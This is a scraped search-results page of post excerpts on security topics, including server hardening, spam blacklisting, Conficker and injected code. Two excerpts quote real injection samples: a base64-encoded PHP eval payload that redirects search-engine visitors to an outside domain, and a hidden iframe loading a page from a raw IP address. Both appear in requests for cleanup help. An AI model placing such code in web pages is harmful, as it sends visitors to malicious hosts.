Search Results

Search found 417 results on 17 pages for 'malicious'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 10/17 | < Previous Page | 6 7 8 9 10 11 12 13 14 15 16 17  | Next Page >

  • 9 Gigapixel Photo Captures 84 Million Stars

    - by Jason Fitzpatrick
    The European Southern Observatory has released an absolutely enormous picture of the center of the Milky Way captured by their VISTA telescope–the image is 9 gigapixels and captures over 84 million stars. From the press release: The large mirror, wide field of view and very sensitive infrared detectors of ESO’s 4.1-metre Visible and Infrared Survey Telescope for Astronomy (VISTA) make it by far the best tool for this job. The team of astronomers is using data from the VISTA Variables in the Via Lactea programme (VVV), one of six public surveys carried out with VISTA. The data have been used to create a monumental 108 200 by 81 500 pixel colour image containing nearly nine billion pixels. This is one of the biggest astronomical images ever produced. The team has now used these data to compile the largest catalogue of the central concentration of stars in the Milky Way ever created. Want to check out all 9 billion glorious pixels in their uncompressed state? Be prepared to wait a bit, the uncompressed image is available for download but it weighs in at a massive 24.6GB. 84 Million Stars and Counting [via Wired] How Hackers Can Disguise Malicious Programs With Fake File Extensions Can Dust Actually Damage My Computer? What To Do If You Get a Virus on Your Computer

    Read the article

  • DIY Halloween Decoration Uses Simple Silohuettes

    - by Jason Fitzpatrick
    While many of the Halloween decorating tricks we’ve shared over the years involve lots of wire, LEDs, and electronic guts, this one is thoroughly analog (and easy to put together). A simple set of silhouettes can cheaply and quickly transform the front of your house. Courtesy of Matt over at GeekDad, the transformation is easy to pull off. He explains: It’s really just about as simple as you could hope for. The materials needed are: black posterboard or black-painted cardboard; colored cellophane or tissue paper; and tape. The only tools needed are: measuring tape; some sort of drawing implement — chalk works really well; and scissors and/or X-Acto knife. And while you need some drawing talent, the scale is big enough and the need for precision little enough that you don’t need that much. For a more thorough rundown of the steps hit up the link below or hit up Google Images to find some monster silhouette inspiration. Window Monsters [Geek Dad] How Hackers Can Disguise Malicious Programs With Fake File Extensions Can Dust Actually Damage My Computer? What To Do If You Get a Virus on Your Computer

    Read the article

  • Removing write permission on home and public_html on Centos/Cpanel

    - by user5858
    I'm running sites on two Cpanel accounts on my VPS on WHM. I'm using DSO php handler and Apache server on my Web server. After recent intrusion attacks I've chowned to root with permission 555 on $HOME and public_html folder. I'm on VPS with Cpanel on Centos. I'm running CMS based software like Joomla Drupal etc. Will this cause any problem to my VPS installation or server side processes? Drupal, Joomla, MyBB etc will not be affected by this. Some files will not be created like error_log. At least hackers will not be able to place any malicious code within home folder or the public_html folder.

    Read the article

  • Steps to make sure network is not blacklisted...Again

    - by msindle
    I have an interesting issue. I have a client that just got blacklisted due to spam being sent out over the last 2 days. I have my firewall configured to only allow mail to go outbound on port 25 from our mail server (Exchange 2010) exclusively and I have verified that there are no open relay's on our transport rules. We are running Vipre Business and after running deep scans with updated definitions all computers come back clean. I ran a message tracking report on our Exchange server that shows all mail sent via the mail server over the last couple of weeks and didn't see anything malicious or out of the ordinary. I have also verified that there are no home devices or rouge computers on the network. For all practical purposes it appears that the network is clean, but we still wound up on 5 or 6 blacklists...Where should I start looking next? Is there a "best practices" guide that can help eradicate this issue? Thanks in advance! msindle

    Read the article

  • Secure Apache PHP vhost configuration

    - by jsimmons
    I'm looking to secure some websites running under apache using suexec. At the moment php is executed with the user/group of the file being executed. This seems to me, not secure enough. It stops vhosts interfering with each other, but does not stop malicious code writing anywhere in the vhost being used. I was thinking that a possibility would be to run scripts as nobody/vhost group, that way the vhost user could still have full access to the vhost directories, but executing php would only be able to write to files with g+w, and to execute files with g+x. This I think should stop arbitrary writing in the web dir from compromised php. Just wondering if this is crazy, ridiculous, stupid? Of course this would be done on top of existing security measures.

    Read the article

  • grep, xargs, sed to clean up PHP eval hack

    - by roktechie
    I'm attempting to use the commands found on http://devilsworkshop.org/tutorial/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/55587/ to clean up a PHP eval based hack on a site. Sample code to match/remove <?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9sb29wZG93bi5sZmxpbmt1cC5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9")); Attempted command: sudo grep -lr --include=*.php "eval(base64_decode" /home/user/webdir | sudo xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g' The sudo has been added as it is required to have permission to read/write on the dir I'm accessing. The files list properly from grep, but are not changed by sed. Any suggestions?

    Read the article

  • In Windows XP, is it possible to disable user credential caching for particular users

    - by kdt
    I understand that when windows caches user credentials, these can sometimes be used by malicious parties to access other machines once a machine containing cached credentials is compromised, a method known as "pass the hash"[1]. For this reason I would like to get control over what's cached to reduce the risk of cached credentials being used maliciously. It is possible to prevent all caching by zeroing HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount, but this is too indiscriminate: laptops users need to be able to login when away from the network. What I would like to do is prevent the caching of credentials of certain users, such as administrators -- is there any way to do that in Windows XP? http://www.lbl.gov/cyber/systems/pass-the-hash.html

    Read the article

  • Pick Up BioShock and Bioshock 2 for Price of a Big Mac Meal

    - by Jason Fitzpatrick
    Pre-ordering just opened on the third-installment of the highly-acclaimed horror-survival game series BioShock, BioShock Infinite. As part of the pre-order promotions, you can pick up a bundled copy of BioShock and BioShock 2 for a song. For the unfamiliar, BioShock is an atmospheric first-person-shooter backed up by an incredible storyline set in the underwater utopian-turned-dystopian city of Rapture. BioShock 2 continues the story in Rapture and the upcoming release (Febuary 2013) of BioShock Infinite takes place in the same game universe but fifty years before the events of the first two installments. If that seems like the kind of game you could dig into, Amazon has the Windows-platform version of BioShock and BioShock 2 bundled together for a scant $7.49–81% off the Steam and general retail price. The best part about the promotion is you can either download the games from Amazon or, for those of you that use Steam, you can simply plug the game product key into Steam. You can read more about the both the original two games and the upcoming release at the official BioShock site. BioShock Dual Pack [via Geeks Are Sexy] How Hackers Can Disguise Malicious Programs With Fake File Extensions Can Dust Actually Damage My Computer? What To Do If You Get a Virus on Your Computer

    Read the article

  • Is WinRT really as secure as it's made out to be?

    - by IDWMaster
    Prior to releasing Windows 8, Microsoft claimed that all WinRT apps are cleanly removed from your computer after uninstalling them, and that WinRT apps should not interfere with other running applications, because they are ran in a "sandboxed" environment. Microsoft has also claimed numerous times on Channel9 that Windows 8 apps are not ran in a VM. So my question is; are these claims accurate? If the application is not running inside of a VM, how is it possible to protect the system against malicious code at runtime, assuming the attacker was able to bypass the screening process of the Windows Store system? Microsoft allows "native code" in WinRT apps, so wouldn't it be possible (using hand-coded assembly or some odd pointer manipulation trick to call functions outside of the sandboxed environment and interfere with the rest of the system, if it's really "native code" and not some VM?

    Read the article

  • Can't open Control Panel or IE

    - by Josh
    I have a XP computer where when ever I try to open Control Panel nothing happens, nothing flashes on the screen. Same thing with Internet Explorer. I've scanned the computer with Malwarebytes and Avast, Malwaresbytes found some Adware which it removed without problems. Avast found nothing. I looked at the running processes with Process Explorer, nothing malicious running. And looked at a Process Monitor output when I tried to run IE, nothing obviously wrong. The process just decides to exit. What can I try next? I would suspect corrupt IE install but Control Panel doesn't work either. UPDATE: Nether work in Safe Mode under the user account. (only 1 user on the computer) But in Safe Mode, under the built in Administrator account, they work. So what ever is broken, is only broken in the one account. Anything under the HKCU registry key that could break this?

    Read the article

  • How can I run my program on a large number of computers? [closed]

    - by zenpoy
    I'm looking for a (preferably free) service for running an executable I wrote? It's not malicious, it's not a virus, it's not scam, and if this is really important I can upload the python source code instead. I wrote a small crawler to gather information regarding the style of web pages for my MA project, and I need a lot more data. EDIT Here is more information on my problem and how I approach on solving it, and where I'm stuck. As part of my research I'm trying to classify text based on it's style (font-family for now), my data is based web pages, so I wrote a client/server application - the client is a crawler that gathers this data and send it to the server. The problem is that like 99% of the internet is Arial, Verdana and Helvetica - other fonts are far more rare, so I need to spend very long time to gather enough data regarding these fonts. Hope this explains it.

    Read the article

  • Why is Chrome receiving data?

    - by Aero
    Chrome seems to be continually receiving data even though I'm not downloading anything. This is making a noticeable impact on my browsing speed. The first screenshot shows Chrome receiving data even though I'm not downloading anything (nor buffering a YouTube video etc.) Even after I completely close Google Chrome, the "chrome.exe" remains in the Resource Monitor list and the "Received bytes" column continually increases in the screenshot below. However, "chrome.exe" does not show up in the Processes tab of Task Manager. This only occurs sometimes, but I don't know why. I have tried running a malware/virus scans to ensure that there is nothing malicious behind this, but those scans have shown nothing. Any ideas on what's causing this?

    Read the article

  • What is the technique used to make my IIS 7 serve all pages with an injected iframe

    - by Andre Carlucci
    Since my previous question was closed without an answer, I'm changing it a bit and asking again. All my pages are being served with an malicious iframe injected just before the html tag. The code looks like this: <iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR"> ... Firstly I thought it could be something related with wordpress, but my asp.net sites are also infected and even if I create a static html file with nothing inside, the iframe is injected. I'm using a Windows Server 2008 R2 Standard with IIS7.5 7600. Anyone knows how to do this in IIS?

    Read the article

  • Tracing what program is making a network connnection? (CentOS)

    - by Airjoe
    I was wondering if it is possible to find out which process is trying to make a specific network connection. On a server I support which hosts websites for about 200 users, the iptables firewall keeps blocking, as it should, a connection to 212.117.169.139 on port 80. Firefox reports this as an attack page (and at the least is obvious spam, if not malicious). It seems something on this server is trying to access this site for some reason, and although it's being blocked successfully, the requests seem to be going through every two to sixty seconds and I'd like to be able to find what process or script is doing this so I can handle it appropriately. Besides doing a grep to try and find if this IP is in some file (which probably won't even work because it may be working by hostname or it may be encoded), is there any way to find out some more information? Thanks!

    Read the article

  • How do I securely share my server?

    - by Blue
    I have a large dedicated server running Debian and I want to share it with about 6 friends of mine. I know I can simply just use adduser to create user accounts for them, but I want to know if they can, even as a regular user without root permissions, do anything malicious. I know by default they have read permissions for other users in the /home, and can solve that with chmod, but I just want to make sure that there's nothing else they can do. And also, is there any kind of script or program that makes it easier to create and manage shell users on a server?

    Read the article

  • Putting a whole linux server under source control (git)

    - by Tobias Hertkorn
    I am thinking about putting my whole linux server under version control using git. The reason behind it being that that might be the easiest way to detect malicious modifications/rootkits. All I would naively think is necessary to check the integrity of the system: Mount the linux partition every week or so using a rescue system, check if the git repository is still untempered and then issue a git status to detect any changes made to the system. Apart from the obvious waste in disk space, are there any other negative side-effects? Is it a totally crazy idea? Is it even a secure way to check against rootkits since I most likely would have to at least exclude /dev and /proc ?

    Read the article

  • What exactly is an invalid HTTP_HOST header

    - by rolling stone
    I've implemented Django's relatively new allowed hosts setting, which is meant to prevent attackers from submitting requests with a fake HTTP Host header. Since adding that setting, I now get anywhere from 20-100 emails a day notifying me of invalid HTTP_HOST headers. I've copied in an example of a typical error message below. I'm hosting my site on EC2, and am relatively new to setting up/maintaining a server, so my question is what exactly is happening here, and what is the best way to manage these invalid and I assume malicious requests? [Django] ERROR: Invalid HTTP_HOST header: 'www.launchastartup.com'.You may need to add u'www.launchastartup.com' to ALLOWED_HOSTS.

    Read the article

  • Should this be written in C or php?

    - by user1867842
    This is my code; it speaks for itself on what I'm trying to do. <?php define("html","<html>"); define("htmlEnd","</html>"); etc... etc... ?> What I'm trying to do is make a wrapper for html's tags so they won't be needed anymore. But I can't get any of the attributes for html elements to be defined in PHP. This again speaks for itself; I don't know any other way of saying this. I guess how would I make another mark-up language like HTML without any tags but still keep everything about HTML is what I'm trying to say. My idea is for preventing XSS. For example, creating a special framework for the website itself that way there is no way any malicious attacker can guess because they know the HTML or PHP. I just don't want to make my website or something, and then my website gets hacked. Or if I make a website for someone and the website gets hacked. I am going to look like a unprofessional web developer. And what if I never get a job again.

    Read the article

  • Is it necessary to change the default users and groups in VMware esxi 4.0 in order to have a secure

    - by Teevus
    By default esxi creates a number of users and groups including: daemon nfsnobody root nobody vimuser dcui How secure is this default security setup? Besides changing the root password, is it advisable to modify the default users and groups? E.g. does esxi use default passwords for the accounts or anything else that could be exploited by malicious users? My scenario is very basic and I don't require any custom users or groups as only sysadmins will ever need to administer the virtual infrastructure, and they can do so using the root account. Thanks

    Read the article

  • What is the best way to compare vhost traffic?

    - by Bob Flemming
    Recently one of my servers has been subjected to malicious ddos attacks. I have about 12 websites hosted on the server which uses name based v-hosting. I am trying to identify which virtual host(s) are getting bombarded with traffic. I have used tools such as iftop which is good for identifying hosts which are consuming lots of bandwidth, and also apachetop which is useful for identifying which resources are being requested on a single v-host. What I really need is a tool which allows me to see the amount of traffic being received by each v-host in real time so I can easily see which v-host is being targeted. Does such a tool exist?

    Read the article

  • Filtering downloading a file

    - by Ozgun Sunal
    people. i know there are several types of firewalls operating at different layers of OSI. ACLs(layer 3 firewalls filter based on port numbers and IP addresses), SPI(which examines the patterns of data at layer 3 and realise that data content is malicious or not) and application layer firewalls which is capable of understanding the data at that level. Considering this, i'll give an example and learn what i need to do. Lets say, we have a computer has access to the Internet. i want to download a file or display a web page from a website but block access to the another website/s or downloading. To do this, i cant block access to the web browser on the 3rd party firewall bcos that will shut down all access. ACLs wont already do it. So, which kind of firewall will make it possible to filter specific traffic and how?

    Read the article

  • Conficker keeps coming back

    - by PHLiGHT
    I hadn't run into anyone who actually got this virus until recently when dealing with a new client that didn't believe in patching their systems and consquently have been hit with this pest. I was under the impression that if you have KB958644 installed and ran the latest malicious software removal tool that conficker would be squashed. I have several systems that are fully patched, MSRT has removed the virus yet the bugger keeps coming back. This has even happened to a file server and a Domain Controller. What am I missing here? They are running AVG which I used to recommend but I have been doubting it's effectiveness over the past year or so.

    Read the article

  • Securing a Cloud-Based Data Center

    - by Orgad Kimchi
    No doubt, with all the media reports about stolen databases and private information, a major concern when committing to a public or private cloud must be preventing unauthorized access of data and applications. In this article, we discuss the security features of Oracle Solaris 11 that provide a bullet-proof cloud environment. As an example, we show how the Oracle Solaris Remote Lab implementation utilizes these features to provide a high level of security for its users. Note: This is the second article in a series on cloud building with Oracle Solaris 11. See Part 1 here.  When we build a cloud, the following aspects related to the security of the data and applications in the cloud become a concern: • Sensitive data must be protected from unauthorized access while residing on storage devices, during transmission between servers and clients, and when it is used by applications. • When a project is completed, all copies of sensitive data must be securely deleted and the original data must be kept permanently secure. • Communications between users and the cloud must be protected to prevent exposure of sensitive information from “man in a middle attacks.” • Limiting the operating system’s exposure protects against malicious attacks and penetration by unauthorized users or automated “bots” and “rootkits” designed to gain privileged access. • Strong authentication and authorization procedures further protect the operating system from tampering. • Denial of Service attacks, whether they are started intentionally by hackers or accidentally by other cloud users, must be quickly detected and deflected, and the service must be restored. In addition to the security features in the operating system, deep auditing provides a trail of actions that can identify violations,issues, and attempts to penetrate the security of the operating system. Combined, these threats and risks reinforce the need for enterprise-grade security solutions that are specifically designed to protect cloud environments. With Oracle Solaris 11, the security of any cloud is ensured. This article explains how.

    Read the article

  • How do web servers enforce the same-origin policy?

    - by BBnyc
    I'm diving deeper into developing RESTful APIs and have so far worked with a few different frameworks to achieve this. Of course I've run into the same-origin policy, and now I'm wondering how web servers (rather than web browsers) enforce it. From what I understand, some enforcing seems to happen on the browser's end (e.g., honoring a Access-Control-Allow-Origin header received from a server). But what about the server? For example, let's say a web server is hosting a Javascript web app that accesses an API, also hosted on that server. I assume that server would enforce the same-origin policy --- so that only the javascript that is hosted on that server would be allowed to access the API. This would prevent someone else from writing a javascript client for that API and hosting it on another site, right? So how would a web server be able to stop a malicious client that would try to make AJAX requests to its api endpoints while claiming to be running javascript that originated from that same web server? What's the way most popular servers (Apache, nginx) protect against this kind of attack? Or is my understanding of this somehow off the mark? Or is the cross-origin policy only enforced on the client end?

    Read the article

  • Logs show lots of user attempts from unknown IP

    - by rodling
    I lost access to my instance which I host on AWS. Keypairing stopped to work. I detached a volume and attached it to a new instance and what I found in logs was a long list of Nov 6 20:15:32 domU-12-31-39-01-7E-8A sshd[4925]: Invalid user cyrus from 210.193.52.113 Nov 6 20:15:32 domU-12-31-39-01-7E-8A sshd[4925]: input_userauth_request: invalid user cyrus [preauth] Nov 6 20:15:33 domU-12-31-39-01-7E-8A sshd[4925]: Received disconnect from 210.193.52.113: 11: Bye Bye [preauth] Where "cyrus" is changed by hundreds if not thousands of common names and items. What could this be? Brute force attack or something else malicious? I traced IP to Singapore, and I have no connection to Singapore. May thought is that this was a DoS attack since I lost access and server seemed to stop working. Im not to versed on this, but ideas and solutions for this issue are welcome.

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 6 7 8 9 10 11 12 13 14 15 16 17  | Next Page >